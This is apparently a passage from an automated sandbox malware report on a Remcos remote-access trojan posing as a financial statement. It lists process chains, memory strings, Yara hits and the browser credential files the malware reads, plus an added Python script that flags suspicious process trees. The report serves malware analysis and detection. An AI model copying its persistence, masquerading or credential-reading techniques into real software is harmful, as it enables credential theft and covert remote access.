0@ABV10@0@Z,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,_wgetenv,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,CloseHandle,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ, \svchost.exe7_2_0040A5F5
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: GetCurrentProcessId,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,OpenMutexA,CloseHandle,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,OpenProcess,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,_wgetenv,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,_wgetenv,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,CloseHandle,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ, \svchost.exe25_2_0040A5F5
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: 7_2_00410145 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,StrToIntA,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,mouse_event,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,7_2_00410145
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeProcess created: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs'
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess created: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess created: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess created: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess created: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess created: unknown unknown
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess created: unknown unknown
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
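          Read as a tree instead of a flat list, the "Process created" rows above give the delivery chain: the .NET loader starts cmd /c timeout 1, respawns its own image (the hollowed Remcos host), runs install.vbs through wscript.exe, which uses cmd.exe to start the persistence copy from a directory named System32 under %APPDATA%\Roaming, and that copy repeats the timeout and self-spawn pattern. The Python below is an added example, not part of the report, that rebuilds the tree from rows in this page's layout and flags three things worth calling out in triage: a Windows system-folder name used outside the Windows directory, a script host that launches a program via cmd.exe, and a process spawning a copy of its own image. The rows are copied from this section (the "unknown unknown" row included, kept as a leaf); because these rows carry image paths and not PIDs, the tree is keyed by image name, so the several cmd.exe instances collapse into one node, which is a limitation of the input, not of the tree.

```python
import re
from collections import defaultdict

PROC_CREATED_RE = re.compile(
    r"Source: (?P<parent>\S+?\.exe)Process created: (?P<child>\S+) ?(?P<cmdline>.*)$")
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe"}
# Folder names that belong under the Windows directory; seeing one in a
# user-writable path is a masquerading signal (the sample uses AppData\Roaming\System32).
SYSTEM_DIR_NAMES = {"system32", "syswow64", "winsxs"}


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def process_tree(rows):
    """Parent image name -> list of (child image path, command line)."""
    tree = defaultdict(list)
    for row in rows:
        m = PROC_CREATED_RE.search(row.replace("Jump to behavior", "").strip())
        if m:
            tree[basename(m.group("parent"))].append((m.group("child"), m.group("cmdline")))
    return tree


def masquerading_paths(tree):
    """Child image paths that contain a system folder name outside \\Windows\\."""
    out = set()
    for children in tree.values():
        for child, _ in children:
            parts = child.lower().split("\\")
            if "windows" not in parts and SYSTEM_DIR_NAMES & set(parts[:-1]):
                out.add(child)
    return sorted(out)


def script_to_exe_chains(tree):
    """(script host, command line) where a script host ran cmd.exe /c to start a program."""
    out = []
    for parent, children in tree.items():
        if parent in SCRIPT_HOSTS:
            for child, cmdline in children:
                if basename(child) == "cmd.exe" and "/c" in cmdline.lower():
                    out.append((parent, cmdline))
    return out


def self_spawns(tree):
    """Image names that created a new process of their own image, with counts."""
    return {p: sum(1 for c, _ in ch if basename(c) == p)
            for p, ch in tree.items() if any(basename(c) == p for c, _ in ch)}


def render(tree, root, indent=0, seen=None):
    """Indented one-line-per-child view; self-spawns and revisited images are not descended."""
    seen = set() if seen is None else seen
    out = []
    for child, cmdline in tree.get(root, []):
        name = basename(child)
        out.append(" " * indent + name + "  " + cmdline)
        if name != root and name not in seen:  # do not loop on self-spawns
            seen.add(name)
            out.extend(render(tree, name, indent + 2, seen))
    return out


# Constructed sample: ten of the "Process created" rows from this section.
SAMPLE_ROWS = [
    r"Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1Jump to behavior",
    r"Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeProcess created: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe",
    r"Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1",
    r"Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs'",
    r"Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe'",
    r"Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe",
    r"Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1",
    r"Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess created: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe",
    r"Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess created: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe",
    r"Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess created: unknown unknown",
]

if __name__ == "__main__":
    tree = process_tree(SAMPLE_ROWS)
    print("\n".join(render(tree, "extractoserfinanza989543704031499704092798964.exe")))
    print("masquerading:", masquerading_paths(tree))
    print("script host -> cmd /c:", script_to_exe_chains(tree))
    print("self spawns:", self_spawns(tree))
```

          The masquerading check deliberately looks at the image path, not the command line: the wscript-launched command line quotes a real C:\Windows\System32\cmd.exe, and only the child that actually starts, under AppData\Roaming\System32, is the impostor.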
          Source: PxxoServicesTrialNet1.exe, 00000019.00000002.915829064.00000000017E0000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: PxxoServicesTrialNet1.exe, 00000019.00000002.915829064.00000000017E0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: PxxoServicesTrialNet1.exe, 00000019.00000002.915829064.00000000017E0000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: PxxoServicesTrialNet1.exe, 00000019.00000002.916029864.0000000002D86000.00000004.00000040.sdmpBinary or memory string: Program Managererstrator7
          Source: PxxoServicesTrialNet1.exe, 00000019.00000002.916029864.0000000002D86000.00000004.00000040.sdmpBinary or memory string: Program Managerer ]
          Source: PxxoServicesTrialNet1.exe, 00000019.00000002.915829064.00000000017E0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: PxxoServicesTrialNet1.exe, 00000019.00000002.916029864.0000000002D86000.00000004.00000040.sdmpBinary or memory string: Program Manager-Y057I8
          Source: PxxoServicesTrialNet1.exe, 00000019.00000002.916029864.0000000002D86000.00000004.00000040.sdmpBinary or memory string: Program Manager=
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: 7_2_004124A0 cpuid 7_2_004124A0
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: GetLocaleInfoA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,7_2_00409E7D
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: GetLocaleInfoA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,25_2_00409E7D
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeQueries volume information: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe VolumeInformation
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeQueries volume information: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe VolumeInformation (3 occurrences)
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation (3 occurrences)
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation (3 occurrences)
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: 7_2_0041203B GetLocalTime,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,printf,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,7_2_0041203B
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: 7_2_00412163 GetUserNameW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,7_2_00412163
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          Yara detected Remcos RAT
          Source: Yara matchFile source: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.780636700.0000000003E8B000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.710784907.0000000004374000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.706118629.0000000003969000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.781443613.00000000049AD000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.771805512.000000000559E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000018.00000002.752626728.0000000003279000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000021.00000002.728536035.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 0000000F.00000002.766450964.0000000002DE1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000018.00000002.759339292.0000000003C85000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, file source: Process Memory Space: PxxoServicesTrialNet1.exe PID: 4480, type: MEMORY
Source: Yara match, file source: Process Memory Space: PxxoServicesTrialNet1.exe PID: 7144, type: MEMORY
Source: Yara match, file source: Process Memory Space: PxxoServicesTrialNet1.exe PID: 5772, type: MEMORY
Source: Yara match, file source: Process Memory Space: EXTRACTOSERFINANZA989543704031499704092798964.exe PID: 6880, type: MEMORY
Source: Yara match, file source: Process Memory Space: PxxoServicesTrialNet1.exe PID: 6788, type: MEMORY
Source: Yara match, file source: 33.2.PxxoServicesTrialNet1.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 16.2.PxxoServicesTrialNet1.exe.49ce510.5.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 25.2.PxxoServicesTrialNet1.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 24.2.PxxoServicesTrialNet1.exe.3ca6f88.4.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 24.2.PxxoServicesTrialNet1.exe.3ca6f88.4.unpack, type: UNPACKEDPE
Source: Yara match, file source: 7.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, file source: 24.2.PxxoServicesTrialNet1.exe.3c85f68.3.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 7.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 15.2.PxxoServicesTrialNet1.exe.55bf940.3.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 15.2.PxxoServicesTrialNet1.exe.559e920.4.unpack, type: UNPACKEDPE
Source: Yara match, file source: 16.2.PxxoServicesTrialNet1.exe.49ce510.5.unpack, type: UNPACKEDPE
Source: Yara match, file source: 33.2.PxxoServicesTrialNet1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, file source: 25.2.PxxoServicesTrialNet1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, file source: 1.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.4395598.4.unpack, type: UNPACKEDPE
Source: Yara match, file source: 15.2.PxxoServicesTrialNet1.exe.55bf940.3.unpack, type: UNPACKEDPE
Source: Yara match, file source: 1.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.4374578.5.unpack, type: UNPACKEDPE
Source: Yara match, file source: 15.2.PxxoServicesTrialNet1.exe.559e920.4.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 16.2.PxxoServicesTrialNet1.exe.49ad4f0.6.unpack, type: UNPACKEDPE
Source: Yara match, file source: 24.2.PxxoServicesTrialNet1.exe.3c85f68.3.unpack, type: UNPACKEDPE
Source: Yara match, file source: 1.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.4395598.4.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 16.2.PxxoServicesTrialNet1.exe.49ad4f0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 1.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.4374578.5.raw.unpack, type: UNPACKEDPE
Contains functionality to steal Chrome passwords or cookies
Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe, Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data (7_2_0040710F)
Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe, Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data (25_2_0040710F)
Contains functionality to steal Firefox passwords or cookies
Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe, Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ (7_2_0040728F)
Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe, Code function: \key3.db (7_2_0040728F)
Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe, Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ (25_2_0040728F)
Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe, Code function: \key3.db (25_2_0040728F)

          Remote Access Functionality:

Detected Remcos RAT
Source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.710784907.0000000004374000.00000004.00000001.sdmp, String found in binary or memory: Remcos_Mutex_Inj
Source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.710784907.0000000004374000.00000004.00000001.sdmp, String found in binary or memory: \uninstall.vbsexepath\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)\restart.vbsNormalAccess level: Administratorlicence (32 bit) (64 bit)ProductNameInjRemcos_Mutex_InjWDSoftware\licence_code.txt-lShlwapi.dllGetMonitorInfoWEnumDisplayMonitorsuser32EnumDisplayDevicesWSetProcessDEPPolicyShell32IsUserAnAdminGetComputerNameExWkernel32IsWow64Processkernel32.dllGlobalMemoryStatusExGetModuleFileNameExWKernel32.dllPsapi.dllGetModuleFileNameExAProgram Files (x86)\Program Files\1SETTINGS2.7.2 Propth_unencoverridev
Source: EXTRACTOSERFINANZA989543704031499704092798964.exe, String found in binary or memory: Remcos_Mutex_Inj
Source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, String found in binary or memory: \uninstall.vbsexepath\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)\restart.vbsNormalAccess level: Administratorlicence (32 bit) (64 bit)ProductNameInjRemcos_Mutex_InjWDSoftware\licence_code.txt-lShlwapi.dllGetMonitorInfoWEnumDisplayMonitorsuser32EnumDisplayDevicesWSetProcessDEPPolicyShell32IsUserAnAdminGetComputerNameExWkernel32IsWow64Processkernel32.dllGlobalMemoryStatusExGetModuleFileNameExWKernel32.dllPsapi.dllGetModuleFileNameExAProgram Files (x86)\Program Files\1SETTINGS2.7.2 Propth_unencoverridev
Source: PxxoServicesTrialNet1.exe, 0000000F.00000002.766450964.0000000002DE1000.00000004.00000001.sdmp, String found in binary or memory: Remcos_Mutex_Inj
